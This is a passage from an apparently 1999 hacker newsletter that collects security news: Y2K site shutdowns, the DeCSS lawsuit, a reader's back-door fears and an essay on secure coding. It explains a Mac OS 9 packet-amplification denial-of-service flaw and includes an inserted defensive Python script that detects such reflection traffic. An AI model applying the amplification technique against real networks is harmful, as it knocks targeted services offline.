worse, the operating system, instead of being the virus cop, becomes the virus enabler. Imagine a world where half the people in uniform are trying to rob you and where dialing 911 brings a band of serial killers to your door. Such a virus would be very, very difficult to fight. Police try to catch such people by tracing who benefits. But when the goal is revenge and not profit, it gets tough to catch the bad guys. 
If you think catching the Unabomber was time consuming, this would make the search for the Unabomber look very fast, indeed. So with the Windows source code, the hacker could write a program that on June 1, 2001, swaps all bank balances. Someone whose name starts with an A gets Z's balances. Throw credit cards into that mix, and there could be real fun. Maybe some hacker would find it fun to pay off everyone's property taxes. I'll bet everyone who had not paid his tax would tell the truth and pay up voluntarily, wouldn't they? Every programmer I have ever met has always left himself a back door into every system he writes. Does anyone want to bet Microsoft does not have a back door to its software? Does anyone believe that if the judge makes Microsoft publish the source code, Bill Gates would remove the back door before publishing it? He would not dare. The judge might put him in jail for modifying the code. Couldn't have that now, could we? If he would leave it in, every highly skilled programmer would have a key to everything running on Microsoft software. We can rest assured that every hacker is totally honest, can't we? And with the Internet, those hackers would all be in places where Americans are loved, such as Belgrade, Yugoslavia, and Baghdad, Iraq, for example. Some hacker might even have fun with a newspaper, such as removing the names of everyone who is a subscriber and replacing them with the names of people who are not. Did I mention court records, employment records, child support records? All Microsoft bashers in and out of government should beware. It looks like they are going to get what they wished for. Ray Malone MBS Software Chillicothe, Ohio a real zero. Re:Reply to this letter. (Score:0) by Anonymous Coward on Monday December 27, @02:34PM EST (#114) I'd call him an idiot and get on with things. Re:Reply to this letter. 
(Score:0, Offtopic)
by BiLlCaT (neo_at_jay_pee_jay_dot_net) on Monday December 27, @03:27PM EST (#132)
(User Info) http://www.jpj.net/~neo

i blew stewart's through my nose when i read this. as if anyone could (or would want to) analyze the source for windows. holy christ... just look at the mozilla project. of course the code to MS's TCP stack might be fun to tinker with (not). l8r. --bc

@HWA

25.0 AirForce to Close Web Sites Over Y2K
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

Instead of properly securing public access systems and remaining vigilant over the New Years holiday the Air Force has decided to retreat and deny the public its right to information. Fearing online attacks over the upcoming holiday they have decided to shut down some public web sites which they hope will protect them from attack. (Your web site will have the same holes on New Years day as it will the day after.)

Associated Press - via Yahoo
http://dailynews.yahoo.com/h/ap/19991228/tc/y2k_military_web_sites_1.html

Tuesday December 28 2:41 AM ET

Air Force To Close Some Web Sites

By JAMES HANNAH Associated Press Writer

DAYTON, Ohio (AP) - Fearing attacks by computer hackers, some Air Force bases plan to block access to their public World Wide Web sites over the New Year's weekend, officials say. Other bases have been asked to consider closing down their sites temporarily.

``Each one of the Web masters were told they might want to consider any vulnerabilities,'' Maj. John Anderson, an Air Force spokesman at the Pentagon, said Monday. For some, he said, that means blocking access at a prime time for Internet pranks.

Timothy Conley, deputy director of the 88th Communications Group at Wright-Patterson Air Force Base in Dayton, estimates there are about 30 public Web sites maintained at the base - from pages for the United States Air Force Museum to the Air Force Institute of Technology.
The concern, he said, is that hackers emboldened by widespread Y2K computer concerns could insert viruses that would alter or destroy information on the sites. ``We feel they may plant some things on servers or e-mail that might go off after (Jan. 1),'' Conley said.

He said there is no threat to national security because the public-access sites are separated from secure sites, which will remain operational.

The Pentagon's main Web site should stay operational over the weekend, said spokeswoman Susan Hansen. Even so, officials there have voiced concern about attacks from cyberspace, and say special precautions will be taken. Each of the military services has its own network monitoring stations, and a centralized Pentagon network monitoring system has been set up in Arlington, Va.

Jim Neighbors, manager of the Air Force's Y2K program, said any attacks on the Air Force sites would amount to a nuisance. ``I liken it to somebody going in and defacing a wall with a can of spray paint,'' he said.

@HWA

26.0 Sweden Plans Cyber Defense and Attack Force 12/28/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by erewhon

The Swedish government has issued orders for the armed forces to train cyber soldiers to protect the nation's infrastructure from attack as well as destroy hostile systems. (Once again the mainstream media is months behind the times. HNN reported on this story back in July.)

Associated Press - via Washington Post
http://www.washingtonpost.com/wp-srv/aponline/19991227/aponline101858_000.htm

(Sorry, link provided a 404 - article unavailable.
- Ed)

HNN Archive for July 14, 1999
http://www.hackernews.com/arch.html?071499#3

@HWA

27.0 DVD Industry Files Lawsuit Over DeCSS 12/29/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Space Rogue

As reported yesterday by HNN the DVD industry has filed suit in Santa Clara Superior court against numerous people (many to be named later) for posting or even linking to DeCSS. DeCSS is software that can unlock the encryption scheme for DVD disks which can then be used to view your movies on your computer; it could also be used to illegally copy DVDs.

Wired
http://www.wired.com/news/business/0,1367,33303,00.html

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2414488,00.html?chkpt=zdnntop

Washington Post
http://www.washingtonpost.com/wp-srv/WPlate/1999-12/29/026l-122999-idx.html

HNN's copy of the legal complaint
http://www.hackernews.com/special/1999/dvdinjunction.html

DeCSS Defense Site
http://www.lemuria.org/DeCSS/

DVD Copy Control Association
http://www.dvdcca.org/dvdcca/index.html

The legal angle of the DVD Industry's case will hinge on exactly how the DeCSS software was created and whether it was truly reverse engineered and if there was intent to cause harm to the industry.

Wired
http://www.wired.com/news/technology/0,1282,33311,00.html

The hearing has been scheduled for December 29, 1999, at the Superior Court of the State of California, County of Santa Clara to determine if a temporary restraining order should be granted against the named defendants.

PZ Communications
http://www.pzcommunications.com/decss/main.htm

@HWA

28.0 No Evidence of Y2K Viruses or Cyber Terrorist Attack 12/29/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

The National Infrastructure Protection Center has said that they have no evidence pointing to a wide scale cyber attack and so far no serious virus threats have been discovered.
NIPC has said that it does not expect large-scale U.S. infrastructure disruptions.

NY Times - Registration required. Just give 'em a fake address.
http://www.nytimes.com/library/tech/99/12/biztech/articles/29secure.html

December 29, 1999

Experts Play Down Virus Threat to Computers Over the Holiday

By JOHN MARKOFF

SAN FRANCISCO, Dec. 28 -- Though still maintaining a nervous vigilance, computer security experts in the government and private sectors said today that almost no evidence had yet materialized that hackers or terrorists were plotting widespread disruption of computer networks over the New Year's weekend.

Since midsummer, concern has been raised, sometimes with a tone of alarm, that cybercriminals and political terrorists would mark the rollover to the new millennium by planting various kinds of malicious software in networks and computer systems.

However, very little evidence of such activity has emerged in recent weeks, and today the Government's National Infrastructure Protection Center said that it expected no "large-scale U.S. infrastructure disruptions" from Year 2000, or Y2K, computer failures during the next few weeks.

Moreover, because of greatly heightened surveillance that is planned for computer networks around the globe on New Year's Eve and the following days, many experts say that now would actually be the worst time to try an attack.

Nevertheless, the federal agency also said it was preparing for a possible increase in criminal activity, in part because of heightened media attention to Year 2000 threats.

The agency identified four viruses that it said were of particular concern. The first three, known as Microsoft Word macro viruses, use a programming language inside the word processing program to spread through networks. The fourth, identified as PC CIH, is an older program that can seriously damage infected machines.
And yesterday an administration official said that despite the fact that no widespread attacks were expected there is still concern about the potential for damage from malicious programs. "The criminal element has latched on to cyberintrusion as a good avenue," said the official, who spoke on the condition that he not be identified. "Obviously, this is an issue of concern." Kathy Fithen, manager of the Computer Emergency Response Team Coordination Center at Carnegie-Mellon University, said: "Right now we're not seeing anything out of the ordinary. For Jan. 1, the biggest thing we anticipate is computer viruses that have targeted that date to execute." Last week, the Government official in charge of protecting the nation's electronic infrastructure said he knew of no documented cases in which malicious software had been implanted during efforts to fix Year 2000 errors. Earlier this year, various experts had voiced concerns that in the frenzy to make repairs to software, a few rogue programmers hired as temporary workers might secretly build in "back doors" that could later be exploited by criminals to invade networks without setting off computer security systems. In July, the Gartner Group, a computer consulting and market research firm, predicted at least one theft of $1 billion next year directly resulting from this year's repairs. The threat alone can be costly. Even if would-be intruders fail to exploit such a back door, an organization that suspects that its software has been compromised must assign its best engineers to systematically examine enormous amounts of code for tiny, hard-to-find alterations. Bruce Schneier, president of Counterpane Internet Security Inc. in San Jose, Calif., said such back-door attacks had been extremely rare, and last week, Richard A. Clarke, the president's national coordinator for computer infrastructure security and counterterrorism, said the government had not documented a single such security breach. 
This week, Gartner Group's computer security experts acknowledged a lack of evidence for secret back doors. "I've heard lots of stories," said William Spernow, the research director for Gartner's information security strategies group. "But when I have asked for the code, I've gotten nothing."

One computer security firm that has assessed the added risk from Year 2000-related viruses and security attacks estimated that the odds of a major "virus event" for the period were about 1 in 14, or 7 percent. The firm, ICSA.net, also placed odds of a single attacker breaching 100 or more computer sites over the weekend at 9 percent.

Several antivirus software companies today said that while they would not rule out the possibility of a widespread destructive event over the weekend, they had not seen evidence of such viruses yet.

"Nothing happened over Christmas, which may be a pretty good indication that nothing major will happen on Jan. 1," said Vincent Gullotto, director of the anti-virus emergency response team at Network Associates, a Silicon Valley software publisher.

@HWA

29.0 Pentagon and Others Take Air Force Lead and Shut Down Sites 12/29/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Code Kid

The Pentagon and the federal personnel agency will be taking the Air Force's lead and will be shutting down some of their public web sites over the new year thereby denying US citizens of their right to access public information. Fearing a massive 'hacker attack' the agencies have decided it is better to shut down the sites than repair any possible damage later. (If your web site is vulnerable today it will be vulnerable tomorrow. This tells me that you are not confident enough in your own web site's ability to fend off attack but you expect the American public to remain calm during the Y2K rollover.)
Associated Press
http://dailynews.yahoo.com/h/ap/19991228/tc/y2k_national_9.html

Reuters - via Yahoo
http://dailynews.yahoo.com/h/nm/19991228/wr/yk_hackers_2.html

AP: Tech Headlines

Tuesday December 28 7:17 PM ET

Military Closing Web Sites for Y2K

By TOM RAUM Associated Press Writer

WASHINGTON (AP) - Taking last-minute precautions, the Pentagon and the federal personnel agency are shutting down some of their public Internet sites this weekend to keep them safe from computer hackers as the calendar rolls over to 2000.

And the Department of Veterans Affairs has decided to mail January benefit checks to more than 2.5 million veterans on Dec. 30, a day early, to avoid potential delays related to the Y2K computer bug, officials disclosed Tuesday. The early mailings ``will mitigate unexpected year 2000 interruptions of benefit payments arising from anything outside our control,'' VA spokesman Terry Jemison said.

The Social Security administration announced last week that checks and electronic deposits for 44 million elderly and disabled Americans also would be dispatched for delivery a day early. Y2K-compliant files for electronic Social Security payments will be at banks by Dec. 30 rather than the usual Dec. 31. Checks will be mailed earlier as well. Most people normally would receive Social Security benefits on Jan. 3.

While making some last-minute adjustments, the government continued to sound a note of optimism about the country's readiness. The nation's top health official said people are not hoarding drugs so there will not be any shortages of medicine over New Year's. ``Americans have used common sense,'' Health and Human Services Secretary Donna Shalala said, citing a 60-90 day supply for nearly every category of medicine.

Federal officials also expressed confidence about 911 calls going through and public safety officials being able to dispatch services. But they advised Americans to keep emergency numbers on hand.
``There was a way to call the police, to call ambulance services, long before 911,'' Federal Communications Commissioner Michael Powell said. Some problems, particularly overseas, may not become evident for weeks. And those that show up Jan. 1 in early time zones may not be a good predictor of what the United States can expect, according to Bruce McConnell, director of the United Nations International Y2K Cooperation Center. Some of the government's emphasis switched from potential computer glitches - nearly all of these have been fixed, officials insist - to the threat of cyber attacks. Many military installations around the country will be shutting down their Web sites temporarily as a safeguard against intrusions - as well as a protection against Year 2000 viruses that might be launched on New Year's Eve. ``Within some defense agencies, they have thought the most prudent action was just to take their sites offline,'' said Pentagon spokesman Adm. Craig Quigley. While the Pentagon intends to keep its central Web site - www.defenselink.mil - in operation, Quigley said one site being temporarily blocked is that of the Defense Finance and Accounting Service, which oversees military pay. ``We're going the extra mile to make sure our people's pay isn't affected,'' Quigley said. Also being taken offline this weekend: the Web site maintained by the Office of Personnel Management, which services the rest of the government payroll. Susan Hansen, a Pentagon spokeswoman who deals with Y2K issues, said officials felt it was important to keep the main ``DefenseLink'' site up because ``that's how we will be transmitting information during the rollover.'' She said special precautions were taken to secure the site. Bases temporarily closing their Web sites include Wright-Patterson Air Force Base in Dayton, Ohio. About 30 public sites are maintained at the base, including Web pages for the United States Air Force Museum and the Air Force Institute of Technology. 
``We feel they (hackers) may plant some things on servers or e-mail that might go off'' after the New Year begins, said Timothy Conley, deputy director of the 88th Communications Group at Wright-Patterson.

He said there is no threat to national security because the public-access sites are separated from secure sites, which will remain operational.

The commandant of the Marine Corps., Gen. James L. Jones, canceled weekend travel plans, although aides said the changes were family-related and not prompted by fears of Y2K disruptions.

Capt. Pete Mitchell, a spokesman for the corps, said the Marines were taking various steps to make sure there is a ``seamless transition'' to 2000.

``It is a network security issue as much as it is a Y2K issue,'' said Mitchell. ``All the branches are beginning to do things to restrict, to limit the risks of intrusion by decreasing electronic footprints.''

In addition to tracking stations set up by each service, a centralized Pentagon network monitoring system has been set up.

As for civilian communications, industry and federal leaders reiterated their caution against people picking up the phone just to see if it is working or dialing 911 just to check it.

Too many callers at once could clog the network, meaning some might get a fast busy signal. But that wouldn't necessarily indicate any Y2K-related problems, said the FCC's Powell.

``This is a basic network congestion issue that we see every Mother's Day. This is Mother's Day on Viagra,'' he said.

The nation's largest telephone companies have said for months that their networks are ready. But officials say they have more limited information on international calling and smaller, rural U.S. phone companies.

Yahoo:

Tuesday December 28 9:46 PM ET

U.S. Air Force Cautions Web Sites on Y2K Hackers

WASHINGTON (Reuters) - The U.S.
Air Force has given its 900 public Web site managers permission to shut down the sites around the New Year to guard against computer hackers, an Air Force spokesman said on Tuesday.

``There is no specific threat, it's simply heightened security. If you're not up on the 31st, there is nothing they (hackers) can do about it,'' said spokesman Maj. Andree Swanson.

The message was delivered to the public Web site operators inside the Air Force, the people who run facility and base Web pages. None of the sites contains classified information.

``These decisions on whether to shut down or not is up to the individual Web site,'' Swanson said.

The main Air Force page -- www.af.mil -- has no plans to close this weekend.

``They all have the option to shut down, but it's not mandatory. Some sites are more secure than others,'' Swanson said.

Hackers have invaded Air Force Web sites in the past, she said, noting that many such attackers are looking to make a name for themselves.

President Clinton's top aide on Y2K matters earlier this month asked computer hackers to exercise self-restraint until after Year 2000 technology fears have passed.

Y2K concerns revolve around computer systems programmed to read only the last two digits of a year. If left uncorrected, it is feared systems will read 2000 as 1900, causing widespread malfunction.

Adding to the anxiety are worries that hackers will take advantage of possible Y2K confusion to pierce computer security defenses.

@HWA

30.0 More from CCC Congress in Germany 12/29/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by evenprime

As the latest Chaos Computer Club Congress goes into full swing during its second day Wired reporter Steve Kettmann issues his report. (I'm gonna hafta get over there one of these years.)

Wired
http://www.wired.com/news/culture/0,1284,33312,00.html

Chaos Computer Club
http://www.ccc.de/

Chaos Hackers Seek Order
by Steve Kettmann
3:00 a.m.
29.Dec.1999 PST

BERLIN -- Even if media-hyped panic over how computers will handle the Y2K changeover gets people worked up over nothing, the world could still be a better place as a result.

That, at least, was the impression emerging midway through this week's three-day Chaos Computer Club hacking congress here. The renowned visionaries of the CCC believe that technology matters a great deal in our lives, much more than most people believe, and are pleased to see the rest of the world catching up.

"The world is being reminded of how reliant on technology we are," said CCC leader Frank Rieger. "Even if nothing happens, we will know more about how technology and society are intertwined. Fortunately, in Germany there hasn't been much talk about hackers doing evil, the way there has in the United States. We have a very good standing here."

German politicians seek out CCC members as advisers: Club members gather to take on the big questions, too, not just to share tips on issues like "Buffer Overflows" -- the actual title for a Tuesday morning session at the congress.

No facet of the intertwining of society and technology is as dramatic as Tuesday's big theme -- the expanding reach of government surveillance, popularized in American movies like Enemy of the State.

One early-afternoon workshop urged people to cooperate in a project to map all the surveillance cameras in Cologne, and ultimately Germany.

British signal intelligence expert and journalist Duncan Campbell gave an address on the extent world governments spy on each other -- and the rest of us, too.

Campbell described in detail the system of ground-based listening stations called Echelon that enables the US and British governments to intercept transmissions -- and, most important, sort the data, earmarking what receives closer scrutiny and filtering out what is to be ignored.
The European parliament is so concerned about Echelon -- whose existence is still officially questioned -- that it commissioned a report from Campbell and set hearings for this coming February. It's vindication for Campbell, who has sounded the alarm over government intrusion into privacy for decades, since first writing about the British version of the US National Security Agency in 1976. "This is really his finest hour," said Rop Gonggrijp, a hero to European hackers for organizing the 1997 outdoor hacker camp HIP. "A lot of people can see now that he wasn't just being paranoid when he said a lot of this 20 years ago. "It's hard to come to terms with the fact that so many people don't believe this is going on. You may have an idea about the scale of what your government does, but you have to sort of ditch all of what you thought you knew. Even people who have nothing to fear should be aware of this because it will give you an idea of how the world really works. All major wars have a signal intelligence component." Campbell believes that government agencies like the NSA, featured in 1998's Enemy of the State, are moving more in the direction of monitoring email and fax transmissions. "Certainly it's unbelievable that they would make so major an investment unless they are confident of getting into the big fiber-optic cables that will be the backbone of planetary communication in coming decades," he said. "Enemy of the State both helped and hurt," Campbell added. "It helped because it raised consciousness, but it hurt because it was off the wall. It creates an impression of surveillance that's quite obviously not possible. But that's Hollywood. "It's a very difficult area for people to understand and believe. Awareness is growing exponentially, first in Europe and also in the United States. The NSA will survive. But they are going to face a big shakeup. This creates the possibility that they can also be shaken up in areas that lead to the protection of privacy." 
@HWA

31.0 Apple Patches OS 9 Security Hole 12/29/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Space Rogue

A hole in the TCP/IP protocol stack on MacOS 9 could leave users' systems open to launching a distributed attack without the users' knowledge. MacOS 9's networking software, Open Transport, will automatically respond to certain data packets; by triggering numerous machines, an attacker could overwhelm a target site, creating a denial of service attack. Apple released a patch within hours of notification. (And during the holidays as well, yeah Apple.)

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2414764,00.html?chkpt=zdnntop

C|Net
http://news.cnet.com/news/0-1003-200-1508646.html?tag=st.ne.1002.thed.1003-200-1508646

Open Transport Tuner 1.0
http://asu.info.apple.com/swupdates.nsf/artnum/n11559

ZDNet:

Apple patches OS 9 security hole

Responding to security alerts, Apple has released a patch for Mac OS 9 to prevent hacks of networked Macs.

By Dan Turner, MacWEEK.com
December 28, 1999 5:59 PM PT

Apple Computer Inc. late Tuesday released a patch for Mac OS 9's Open Transport networking protocol to correct a "flaw" that leaves Macs vulnerable to hackers who could enlist the computers over an Internet connection in distributed denial-of-service (DOS) attacks without the users' knowledge.

The flaw was discovered by Professor John Copeland of the Georgia Institute of Technology, who heads that school's School of Electrical and Computer Engineering.

Only Macs that are running Mac OS 9 and are attached to "always-on" Internet connections, such as digital subscriber lines (DSLs) and cable modems, are vulnerable, Copeland said.

In an advisory from Carnegie Mellon University's computer security center, Apple acknowledged earlier today that it "reproduced the problem" and was "moving quickly to put a solution in place." Hours later Apple posted the patch, Open Transport Tuner 1.0, on its Software Updates Web page.
Copeland told MacWEEK that attackers can "scan" cable or DSL networks for computers running Mac OS 9; these Macs can then be sent a small (29-byte) packet of data, which Mac OS 9 replies to with a 1,500-byte datagram. "This appears to be the way Mac OS 9 explores an Internet route," Copeland said.

Attackers can then send "trigger datagrams" with a false source address (that of their target) to a large number of Mac OS 9 computers. If these triggers are sent in rapid succession, Copeland said, the "amplified" responses can overwhelm the target's Internet connection, denying service to that target.

Although DOS attacks are a fact of life on the Internet, "it's much harder to stop a distributed attack," Copeland said, because the sources of the attack aren't even aware of their part in it, even as it occurs.

Prior to Apple's (Nasdaq: AAPL) release of the patch, the only sure defense against this exploit was for users to turn off or disconnect their Internet connection, Copeland said.

"I've seen scans of this nature but no attacks yet," said Copeland, who posted online warnings of this type of DOS attack on New Year's Eve. However, Copeland told MacWEEK his warnings are "pure speculation."

-=-

Net attacks could come through latest Apple system

By Jim Davis
Staff Writer, CNET News.com
December 29, 1999, 11:45 a.m. PT

update Computers with the newest version of Apple's Macintosh operating system software could be used as unwitting aides to the latest fad in Internet attacks, according to a new report.

Customers who have installed Mac OS 9 are susceptible to being used in "denial of service" attacks from malicious programmers if their computer is hooked up to the Internet via "always on" digital subscriber line (DSL) or cable modem connections.

The computer expert who discovered the flaw said that it does not appear that Mac computers themselves are being shut down by attacks, but that they merely are capable of being used as pawns to harm other computers.

Dr.
John Copeland, who chairs the Georgia Institute of Technology's School of Electrical and Computer Engineering, said the correction for the flaw needs to be applied before New Year's Eve in order to prevent the Macs from being used to attack other computers. As previously reported by CNET News.com, security experts have warned of a possible concerted effort to attack computers on New Year's Eve. Apple has already issued a fix for the problem at its Web site. Carnegie Mellon University's Computer Emergency Response Team (CERT) said in an advisory note that "Intruders can flood networks with overwhelming amounts of traffic or cause machines to crash or otherwise become unstable." It does not appear that any computers have yet to be used in such attacks; CERT merely reported that such an attack was possible. Cupertino, Calif.-based Apple said in a posted reply to the CERT team: "We've reproduced the problem in our labs. The problem only affects customers running our most recent release of networking software on machines that are continuously attached to the Internet." "Apple is aware of the CERT advisory and has taken steps to address it," confirmed an Apple spokesman. "While we believe the potential risks to our customers is extremely small, we have worked quickly to provide the latest and most secure software to Mac users," he said. In addition to being able to download the fix and installing the software themselves, Mac OS 9 is capable of automatically updating itself with this fix as it becomes available later on specialized Apple servers, but only when the feature is enabled by the user. Most Macintosh customers are not affected by this problem, Apple said. Denial of service attacks aren't new, but there has been a sudden surge in them. Recently, two new families of attacking programs, called the "Tribe Flood Network" and "Trinoo" were identified by experts. Computer experts believe that some attacks are timed to go off when the century turns. 
Generally, denial of service attacks work like this: An attacker secretly embeds software into hundreds of unwitting computers. Then, at a selected time, a command is issued that prompts the infected computers to swamp a target Web site or server with messages in a method of attack called "denial of service." The program doesn't damage the "infected" carrier computers or the target, but the sudden flood of messages typically knocks out the target system. The flaw in the Apple networking software, called Open Transport, could allow an outsider to use a targeted Mac computer as a carrier. Although it's possible for target computers to protect themselves from denial-of-service attacks by ignoring messages, it's hard to identify which computers are attacking them--especially when there are hundreds. This fundamental vulnerability of networked computers makes protecting against denial-of-service attacks extremely difficult. A study released earlier this year reported that computer security breaches were up 16 percent from 1996 to 1997, and that computer-related crime, including security breaches, had cost 241 surveyed organizations $136 million last year. Users of Macintosh computers, in general, have had fewer security issues to deal with over the last few years, in part because there were simply more Windows-based computers to target. But the system itself isn't impervious to the usual array of viruses and other security issues--and neither is the software that runs on it. Last week, for instance, Microsoft said it resolved a potentially troublesome security problem that would have affected online shoppers using the Macintosh version of Internet Explorer. The company issued software that fixes a glitch in the IE 4.5 Web browser which may have made shopping via the Net a risky proposition if not fixed before Jan. 1, 2000. The new Mac OS 9 security issue was first reported at the Macweek Web site. 
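
The reflection pattern Copeland describes above, seen from the defender's side at a cable or DSL network edge, as an added example (not part of the quoted articles, and not Apple's or CERT's code). The packet sizes come from the ZDNet piece; the record layout, thresholds, time window and all addresses (documentation ranges) are assumptions constructed for illustration.

```python
import ipaddress
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    ts: float   # capture time in seconds
    src: str    # source address as written in the IP header (may be forged)
    dst: str
    size: int   # bytes


def find_reflection(packets, local_net, min_ratio=10.0, min_reflectors=3, window=2.0):
    """Return {address: summary} for outside addresses that receive amplified
    replies from at least `min_reflectors` distinct hosts inside `local_net`.

    A reply counts as amplified when it answers an inbound packet claiming to
    come from the same address, arrives within `window` seconds, and is at
    least `min_ratio` times larger than that inbound packet.
    """
    net = ipaddress.ip_network(local_net)

    def is_local(addr):
        return ipaddress.ip_address(addr) in net

    pending = {}  # (claimed source, local host) -> (ts, size) of last request
    hits = defaultdict(lambda: {"reflectors": set(), "bytes_in": 0, "bytes_out": 0})

    for pkt in sorted(packets, key=lambda p: p.ts):
        src_local, dst_local = is_local(pkt.src), is_local(pkt.dst)
        if not src_local and dst_local:
            # Inbound: remember the request and the source it claims.
            pending[(pkt.src, pkt.dst)] = (pkt.ts, pkt.size)
        elif src_local and not dst_local:
            # Outbound: only interesting if it answers a recent request.
            trigger = pending.pop((pkt.dst, pkt.src), None)
            if trigger is None:
                continue
            t_ts, t_size = trigger
            if t_size > 0 and pkt.ts - t_ts <= window and pkt.size / t_size >= min_ratio:
                entry = hits[pkt.dst]
                entry["reflectors"].add(pkt.src)
                entry["bytes_in"] += t_size
                entry["bytes_out"] += pkt.size

    report = {}
    for addr, entry in hits.items():
        if len(entry["reflectors"]) >= min_reflectors:
            report[addr] = {
                "reflectors": sorted(entry["reflectors"]),
                "bytes_in": entry["bytes_in"],
                "bytes_out": entry["bytes_out"],
                "factor": entry["bytes_out"] / entry["bytes_in"],
            }
    return report


# Constructed sample capture: four local hosts each answer a 29-byte packet
# that claims to come from 198.51.100.7 with a 1,500-byte datagram.
VICTIM = "198.51.100.7"
SAMPLE = []
for i, host in enumerate(["192.0.2.11", "192.0.2.12", "192.0.2.13", "192.0.2.14"]):
    SAMPLE.append(Packet(1.0 + i * 0.01, VICTIM, host, 29))
    SAMPLE.append(Packet(1.0 + i * 0.01 + 0.005, host, VICTIM, 1500))
SAMPLE += [
    Packet(2.00, "203.0.113.5", "192.0.2.10", 60),    # ordinary request
    Packet(2.01, "192.0.2.10", "203.0.113.5", 120),   # reply only 2x larger
    Packet(3.00, "192.0.2.20", "203.0.113.9", 1500),  # large, but unsolicited
]

if __name__ == "__main__":
    for addr, info in find_reflection(SAMPLE, "192.0.2.0/24").items():
        print(f"{addr}: {len(info['reflectors'])} local reflectors, "
              f"{info['bytes_in']} B in -> {info['bytes_out']} B out "
              f"(x{info['factor']:.1f})")
```

The address flagged is the one being flooded; the hosts listed as reflectors are the ones that need the patch or a filter in front of them.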
@HWA

32.0 The need for physical security - Securing the OpenBSD console 12/29/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by grant

A white paper from 2600 Australia has been released that covers the need for and reasoning behind physical security of both the console and storage devices of a particular computer and some distilled advice from the misc@openbsd.org mailing list on ways in which the OpenBSD console might be secured from unpassworded physical access.

2600 Australia
http://www.2600.org.au/openbsd-console.html

@HWA

33.0 New Era: Buffer Overflow Article by evenprime 01/03/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

A buffer overflow original article.

contributed by evenprime

Y2K has come and gone and left most people pretty much unscathed. The massive effort to clean up messy code over the last few years looks like it has paid off. What can be learned from this? How can this be applied to writing secure software for the coming millennium? This new article in the Buffer Overflow section examines these questions.

Buffer Overflow
http://www.hackernews.com/bufferoverflow/index.html

A New Era

Written By: evenprime

It is customary to do some reflection this time of year, and I've been doing a little thinking about Y2K. I suppose that makes sense, since it was the part of computing that got the most media coverage the past year. It looks like the date change caused very few problems, and most of those were extremely minor. Still, there are lessons that can be learned from the things that did happen.

It took a lot of time, effort and money to ensure that the date change was uneventful. One thing to learn from Y2K is that it is difficult to fix a program after it is developed and implemented.
Getting all the bugs out of a piece of software that's currently in production usually requires having an outside set of eyes look at the code, as the Social Security Administration recently found out. The application of this principle to the open source movement is evident [1], but even closed source developers can benefit by having their work audited by someone outside the development team, or better yet, outside the company. The DVD Copy Control Association have amply demonstrated the dangers [2] of trying to locate your own design flaws instead of letting someone else examine your work.

Look back at how programming has been done, and at what it has achieved. Date related bugs were everywhere, and had to be fixed. Security bugs are still everywhere. Unchecked input to static buffers, race conditions, and programs that are installed with too many privileges are all around us. All these things come from the same source: a method of software development that focuses on immediate results.

It seems like the only concern most developers have is that the program they write works today, in our current network environment, with the input they expect it to receive. That's a flawed way to look at software use. Y2K has taught us that the things we write will be used far longer than we expect. Users ensure that our programs will receive input that is not what we anticipated. [3] This may be true even if our intended users are not looking for bugs. :) I once wrote a user management script that, due to not checking operator input, was capable of preventing the entire user population from getting to applications necessary for their jobs. A beginner's mistake, but one that showed me how important it is to design programs so that they fail gracefully.

The software problems we have are not new. Lions wrote about race conditions back in 1977 [4]. Dr. Mudge was writing about buffer overflows back in 1995. [5] Where has this gotten us?
Last week bugtraq readers were informed of a root compromise via a race condition, and there were six security-related buffer overflows. There are tools [6] and techniques [7] out there to assist in secure programming, but very few people use them, so we keep seeing the same types of mistakes.

Politicians have noticed the net, and they tend to think it is fairly important stuff. They have been tossing around terms like "Information Super-highway". Presidential Directives [8] have declared computer networks to be part of "America's Critical Infrastructure". The FBI has set up the National Infrastructure Protection Center to guard our networks. Infrastructures are things that are built to last, and when people begin comparing our computer programs to them, we ought to consider the assumptions being made by the users. The highway analogy is kind of interesting; the engineers responsible for highways add safety berms and guard rails to their designs, and they don't run the roads over quicksand. They try to incorporate safety into the design while it is still in the planning stages.

If the rest of the world thinks that we are designing an infrastructure, this industry needs to step back and look at what it is doing. Y2K has taught us that we may be using today's programs for a long, long time, so perhaps we should begin to develop with a different emphasis. This is a good time to consider abandoning the "functionality first" way of doing things and adopting a "durability first" mind set. After all, a new millennium seems like a good time to begin a new era of software development.

1. "Open source keeps designers honest. By depriving them of the crutch of obscurity, it forces them towards using methods that are provably secure not only against known attacks but against all possible attacks by an intruder with full knowledge of the system and its source code. This is real security, the kind cryptographers and other professional paranoids respect."
- ESR
http://www.tuxedo.org/~esr/writings/quake-cheats.html
http://www.tuxedo.org/~esr/writings/cathedral-bazaar/cathedral-bazaar.html

2. "The lesson: This is yet another example of an industry meeting in secret and designing a proprietary encryption algorithm and protocol that ends up being embarrassingly weak. I never understand why people don't use open, published, trusted encryption algorithms and protocols. They're always better."
- Bruce Schneier
http://www.counterpane.com/crypto-gram-9911.html#DVDEncryptionBroken

3. "Security engineering involves making sure things do not fail in the presence of an intelligent and malicious adversary who forces faults at precisely the worst time and in precisely the worst way."
- Bruce Schneier
http://www.counterpane.com/crypto-gram-9911.html#WhyComputersareInsecure

